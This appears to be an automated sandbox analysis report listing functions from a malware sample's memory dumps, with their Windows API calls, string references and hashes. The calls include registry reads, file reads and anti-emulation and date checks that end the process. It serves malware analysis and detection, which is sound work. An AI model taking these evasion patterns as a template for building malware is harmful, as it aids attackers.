RegQueryValueExA.ADVAPI32(00419650,00910590,00000000,00000000,00000000,000000FF), ref: 00422ABC
RegCloseKey.ADVAPI32(00419650), ref: 00422AC6

Strings

Windows 11, xrefs: 00422A80

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
Instruction ID: a9c7c9cb406362f8c98b7ce0903b7f6c91ff65f0f4129b57f21ef6d77cd7d43d
Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
Instruction Fuzzy Hash: 0D01AD71700319BFDB24DBA4AD49EEA777EEB44715F000159FE09D3290EAB499448BE0

Function 00817CC7 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00817A37: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00817A6C
Part of subcall function 00817A37: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00817AB1
Part of subcall function 00817A37: strlen.MSVCRT ref: 00817AE5
Part of subcall function 00817A37: StrStrA.SHLWAPI(?,00434ACC), ref: 00817B1F
Part of subcall function 00817A37: strcpy_s.MSVCRT ref: 00817B48
Part of subcall function 00817A37: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00817B53
Part of subcall function 00817A37: HeapFree.KERNEL32(00000000), ref: 00817B5A
Part of subcall function 00817A37: strlen.MSVCRT ref: 00817B67

lstrcat.KERNEL32(00638E68,00434ADC), ref: 00817CF7
lstrcat.KERNEL32(00638E68,?), ref: 00817D24
lstrcat.KERNEL32(00638E68,00434AE0), ref: 00817D36
lstrcat.KERNEL32(00638E68,?), ref: 00817D57
wsprintfA.USER32 ref: 00817D77
lstrcpy.KERNEL32(00000000,?), ref: 00817DA0
lstrcat.KERNEL32(00638E68,00000000), ref: 00817DAE
lstrcat.KERNEL32(00638E68,00434ADC), ref: 00817DC7

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: ee9227776e1a163bb843850bd3aff5afec6ce4158c572e0447e518cfd2a5e4b6
Instruction ID: 8fee8a8cee3b46d5547da0ec13b699b37817077356628dbc6c3a90bfbe290cb8
Opcode Fuzzy Hash: ee9227776e1a163bb843850bd3aff5afec6ce4158c572e0447e518cfd2a5e4b6
Instruction Fuzzy Hash: 5231A672A042189FCB14DBA8EC449FAB77EFF88314B24551DF506D3250DB74A981CBA0

Function 00836357 Relevance: 9.2, APIs: 6, Instructions: 212COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 008363A1
std::_Xinvalid_argument.LIBCPMT ref: 008363C0
memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 0083641B
memcpy.MSVCRT(00000010,?,?), ref: 0083643F
memcpy.MSVCRT(00000000,?,?), ref: 00836454
std::_Xinvalid_argument.LIBCPMT ref: 00836547

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy$memmove
String ID:
API String ID: 1795094292-0
Opcode ID: 2a4a5d3ddbce30f325ddc875da91afdb60403017f99ea862b9c1950d341a9fb0
Instruction ID: 51f03df63cefb0694d8f508ffd17bba075d0a9b1fa5c9396fc9c91c590a2975c
Opcode Fuzzy Hash: 2a4a5d3ddbce30f325ddc875da91afdb60403017f99ea862b9c1950d341a9fb0
Instruction Fuzzy Hash: 20615F70B00208ABDB28CF5CC99596EB7B6FBC5304F648959E492C7385E730ED6187D9

Function 0082DC07 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0082DC2D
RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?), ref: 0082DC4C
RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,00000000,000000FF), ref: 0082DC70
RegCloseKey.ADVAPI32(?), ref: 0082DC7A
lstrcat.KERNEL32(?,00000000), ref: 0082DC9F
lstrcat.KERNEL32(?,00638968), ref: 0082DCB3

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: b23d715e84088277fc7ecb37460dcd51035e03f7a7eff3f09cee9e62073f6cb7
Instruction ID: 6d2434d2cb1753e05c17f6db172b643d76bf2575b93486be43150c43fb5f3ae8
Opcode Fuzzy Hash: b23d715e84088277fc7ecb37460dcd51035e03f7a7eff3f09cee9e62073f6cb7
Instruction Fuzzy Hash: 6F413BB4A0024D9FCB54EB68DC86EDD77B9FF44304F008464B608D7291EA35AA99CFD2

Function 00819ED7 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00819F0F
LocalAlloc.KERNEL32(00000040,?), ref: 00819F41
StrStrA.SHLWAPI(00000000,00434C28), ref: 00819F6A
memcmp.MSVCRT(?,0042D67C,00000005), ref: 00819FA3

Strings

, xrefs: 00819FCC
<LC, xrefs: 00819F77

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $<LC
API String ID: 4154055062-3067866279
Opcode ID: 593bdc4e3889a0863eabcc69851fa3e713a3accde6d95eb3f4ec782924c56939
Instruction ID: 3c3adcc65664149a2a98396e399e3742b4018e1ec1ddd2dccdb86cf82c354b25
Opcode Fuzzy Hash: 593bdc4e3889a0863eabcc69851fa3e713a3accde6d95eb3f4ec782924c56939
Instruction Fuzzy Hash: 08419D71A00249ABDB10EF69C891EEEB7A8FF44304F058064E945E7252EA30AD96C791

Function 0082EE27 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082EE6B
lstrcpy.KERNEL32(00000000,?), ref: 0082EE9A
lstrcat.KERNEL32(?,00000000), ref: 0082EEA8
lstrcat.KERNEL32(?,0043179C), ref: 0082EEC1
lstrcat.KERNEL32(?,00638DF8), ref: 0082EED4
lstrcat.KERNEL32(?,0043179C), ref: 0082EEE6

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 62f342ca06f7d37881aa09e81d0f367079dd2d600ff3d5062891332eee8e8ade
Instruction ID: c93ad3942025a320fb383bca2d551e0e275f039fd9ea641ecfc6eb2d950fe21f
Opcode Fuzzy Hash: 62f342ca06f7d37881aa09e81d0f367079dd2d600ff3d5062891332eee8e8ade
Instruction Fuzzy Hash: 0F4182B5A00119AFCB14EB68DC46EED77B9FF58300F0044A8BA19D7290DB749E94CFA5

Function 00819CE7 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00811675), ref: 00819D01
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00811675), ref: 00819D17
LocalAlloc.KERNEL32(00000040,?,?,?,?,00811675), ref: 00819D2E
ReadFile.KERNEL32(00000000,00000000,?,00811675,00000000,?,?,?,00811675), ref: 00819D47
LocalFree.KERNEL32(?,?,?,?,00811675), ref: 00819D67
CloseHandle.KERNEL32(00000000,?,?,?,00811675), ref: 00819D6E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
Instruction ID: 182bf3a710f85d24457704fd89b0cd696d361d26a710c7fd8c025ff31fd8e798
Opcode Fuzzy Hash: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
Instruction Fuzzy Hash: 63115BB1600209AFEB20DFA8EC94AEA737EFF04744F104259F915D7280DB709D90CBA0

Function 00409A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0040140E), ref: 00409A9A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040140E), ref: 00409AB0
LocalAlloc.KERNEL32(00000040,?,?,?,?,0040140E), ref: 00409AC7
ReadFile.KERNEL32(00000000,00000000,?,0040140E,00000000,?,?,?,0040140E), ref: 00409AE0
LocalFree.KERNEL32(?,?,?,?,0040140E), ref: 00409B00
CloseHandle.KERNEL32(00000000,?,?,?,0040140E), ref: 00409B07

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4d2679d76374c15b5343d257d3bb4c2d76248abe461406430b74ff22520ad5b8
Instruction ID: e07bc1cf37077e01f74a08ddf4965744106ae1532c602a75826c3d4cb70f4bb0
Opcode Fuzzy Hash: 4d2679d76374c15b5343d257d3bb4c2d76248abe461406430b74ff22520ad5b8
Instruction Fuzzy Hash: 97115E71600209AFE710DFA9DDC8AAB737DFB44350F10016AF901A72C1EB74AD50CBA4

Function 008336B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00833701
GetLastError.KERNEL32 ref: 0083370B

Part of subcall function 00834207: GetProcessHeap.KERNEL32(00000000,?,008177DF), ref: 0083420E
Part of subcall function 00834207: HeapFree.KERNEL32(00000000), ref: 00834215

wsprintfA.USER32 ref: 008337A6

Strings

LC, xrefs: 00833750
LC, xrefs: 0083372F

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$ErrorFreeInformationLastLogicalProcessProcessorwsprintf
String ID: LC$LC
API String ID: 879827129-528129335
Opcode ID: b6831229696c27976b2f59d6c0c966c231127e000902b995e437982320e2534d
Instruction ID: 624115502494181b36d312a9ae89344afcfacf4e9e44a4f9a238a707be1574f6
Opcode Fuzzy Hash: b6831229696c27976b2f59d6c0c966c231127e000902b995e437982320e2534d
Instruction Fuzzy Hash: 02317EB1E006199BCB24CF99D941BAEF7B9FB84B15F10027AE915E3740D7359A01CBE1

Function 00408980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408996

Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA

std::_Xinvalid_argument.LIBCPMT ref: 004089CD

Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD

memcpy.MSVCRT(?,00000000,?,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408A2B

Strings

string too long, xrefs: 004089C8
invalid string position, xrefs: 00408991

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
String ID: invalid string position$string too long
API String ID: 2202983795-4289949731
Opcode ID: be1e48ae44eb35c08a53ce7425593eb67a9c5aa3ab9b03645f4bdfba31e8aa39
Instruction ID: 668d70cf3dd627df833c2d1df51655412700ca9114fd28f549cd6b0e14ccab25
Opcode Fuzzy Hash: be1e48ae44eb35c08a53ce7425593eb67a9c5aa3ab9b03645f4bdfba31e8aa39
Instruction Fuzzy Hash: 6421F8723006108BC720EA5DE940A6AF7A9DBA1760B10093FF5D1DB7C1CA79D841C7ED

Function 00817157 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00407590,00000040,008176F4), ref: 00817167
memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 008171A3
GetProcessHeap.KERNEL32(00000008,?), ref: 008171DB
RtlAllocateHeap.NTDLL(00000000), ref: 008171E2

Strings

@, xrefs: 00817157

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateProcess
String ID: @
API String ID: 966719176-2766056989
Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction ID: 8629a68f3077b087dde9d7768fae716c5d8323d982eb9f6673b9e1cacb5d1b1a
Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction Fuzzy Hash: 17216D706046019BDB248F64DC84BBA73F8FF40705F84446CFA5ACB680E7B8E985CB51

Function 00818FB7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00818ED2,00000000,?,?,00000000), ref: 00818FC9
std::exception::exception.LIBCMT ref: 00818FE4
__CxxThrowException@8.LIBCMT ref: 00818FF9

Strings

$KC, xrefs: 00818FEE, 00818FDA, 00818FF1
$KC, xrefs: 00818FF2

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: $KC$$KC
API String ID: 3448701045-807291510
Opcode ID: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
Instruction ID: 54a596e83b0b0d844792dc4584309410455c1baf2b976c00fee714b54ea93363
Opcode Fuzzy Hash: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
Instruction Fuzzy Hash: 76E06DB190420996DB24EBA89D066EFB3ACFF04315F40066DE926D2581EF74DA05C6DA

Function 0083983F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 00839877
GetCPInfo.KERNEL32(?,?), ref: 0083988A
memset.MSVCRT ref: 008398A2
setSBUpLow.LIBCMT ref: 00839978

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: b43d601b7e2105c586d7e644edcbb48dcaae7d12bd5490e3f5c989b3b4c26550
Instruction ID: a79b8740a6f3fa620a5e90e56703aab06d9b6a26139d775be95a82883eaae6ad
Opcode Fuzzy Hash: b43d601b7e2105c586d7e644edcbb48dcaae7d12bd5490e3f5c989b3b4c26550
Instruction Fuzzy Hash: 95313C209042459EDB259F39C884379BF94FFC2315F1445BEDCC1CE182C6A9C806C7D1

Function 00831F57 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00831FA9

Part of subcall function 00831C57: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00831C86
Part of subcall function 00831C57: lstrlen.KERNEL32(00638DEC), ref: 00831C97
Part of subcall function 00831C57: lstrcpy.KERNEL32(00000000,00000000), ref: 00831CBE
Part of subcall function 00831C57: lstrcat.KERNEL32(00000000,00000000), ref: 00831CC9
Part of subcall function 00831C57: lstrcpy.KERNEL32(00000000,00000000), ref: 00831CF8
Part of subcall function 00831C57: lstrlen.KERNEL32(00434FA4), ref: 00831D0A
Part of subcall function 00831C57: lstrcpy.KERNEL32(00000000,00000000), ref: 00831D2B
Part of subcall function 00831C57: lstrcat.KERNEL32(00000000,00434FA4), ref: 00831D37
Part of subcall function 00831C57: lstrcpy.KERNEL32(00000000,00000000), ref: 00831D66

sscanf.NTDLL ref: 00831FD1
SystemTimeToFileTime.KERNEL32(?,?), ref: 00831FED
SystemTimeToFileTime.KERNEL32(?,?), ref: 00831FFD
ExitProcess.KERNEL32 ref: 0083201A

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
Instruction ID: 5cfe5c727bef39efadbe9bebfd189148aedd7712b129345f7f34a3ea413f176c
Opcode Fuzzy Hash: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
Instruction Fuzzy Hash: E821DFB1508301AF8354DF69D88599BBBF9EED8314F409A1EF599C3220E770A5098BA6

Function 00421CF0 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00422070), ref: 00421D42

Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
Part of subcall function 004219F0: lstrlenA.KERNEL32(00906FF0,00000000,00000000,?,?,00421D51), ref: 00421A30
Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
Part of subcall function 004219F0: lstrlenA.KERNEL32(00434FA4,?,?,00421D51), ref: 00421AA3
Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00434FA4,?,?,00421D51), ref: 00421AD0
Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF

sscanf.NTDLL ref: 00421D6A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D86
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D96
ExitProcess.KERNEL32 ref: 00421DB3

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: def852ea41f2ff09c00a5cd446edebf7d52c94f26f0ecbeab0760d17ddc7f87e
Instruction ID: 04f8fd08741a0fc09d6cb508f0bafc9493e7b9cab1cb2a0045bc539cadffe094
Opcode Fuzzy Hash: def852ea41f2ff09c00a5cd446edebf7d52c94f26f0ecbeab0760d17ddc7f87e
Instruction Fuzzy Hash: 332102B1518301AF8344DF69D88499BBBF9EED8304F409A1EF599C3220E774E6048FA6

Function 00811297 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008112AD
VirtualAllocExNuma.KERNEL32(00000000), ref: 008112B4
ExitProcess.KERNEL32 ref: 008112BF
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008112D3
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00811312

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma
String ID:
API String ID: 3477276466-0
Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
Instruction ID: 6714d9cc910aba6a8ea05d231bf1081ca8838ba04370643d0b2106e78b468754
Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
Instruction Fuzzy Hash: E401F9717403047BEB144AA56C1EFAB77EDEB45B01F205019F704E7280DAB1E90089B4

Function 00406EF0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406F00
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
HeapAlloc.KERNEL32(00000000), ref: 00406F7B

Strings

@, xrefs: 00406EF0

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID: @
API String ID: 1643994569-2766056989
Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction ID: e1db0f0f00307df363e64ad8a88bb248863c5a506cdc1b59983cb41b111b7395
Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction Fuzzy Hash: 92118E70600602CBDB258F60DD84BBB73A4EB40704F054839F946DB6C4FBB8E955CB68

Function 00832D47 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00832D5C
RtlAllocateHeap.NTDLL(00000000), ref: 00832D63
RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,00832CE0), ref: 00832D82
RegQueryValueExA.ADVAPI32(00832CE0,0043509C,00000000,00000000,00000000,000000FF), ref: 00832D9C
RegCloseKey.ADVAPI32(00832CE0), ref: 00832DA6

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
Instruction ID: 2d455ad6b8acd456aa39c3d17f33009219f6eea258d952bf96c4d314704bd7d6
Opcode Fuzzy Hash: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
Instruction Fuzzy Hash: FC01BC75A00318AFE714DBA0AC59FEB7BBDEB49745F200098FA45D7241EA7159088BE0

Function 00811387 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081139C
RtlAllocateHeap.NTDLL(00000000), ref: 008113A3
RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 008113C0
RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 008113DA
RegCloseKey.ADVAPI32(?), ref: 008113E4

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
Instruction ID: a1cb50e7dc1b7356f15649d5a0b26983039d3d6906aee92cdf69466f24272bb1
Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
Instruction Fuzzy Hash: 9DF01775A40308BFDB149BA09C8EFEB7B7DEB04755F101159FE06E2291EAB45A448BE0

Function 00839448 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00839454

Part of subcall function 00838C76: __getptd_noexit.LIBCMT ref: 00838C79
Part of subcall function 00838C76: __amsg_exit.LIBCMT ref: 00838C86

__getptd.LIBCMT ref: 0083946B
__amsg_exit.LIBCMT ref: 00839479
__lock.LIBCMT ref: 00839489
__updatetlocinfoEx_nolock.LIBCMT ref: 0083949D

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

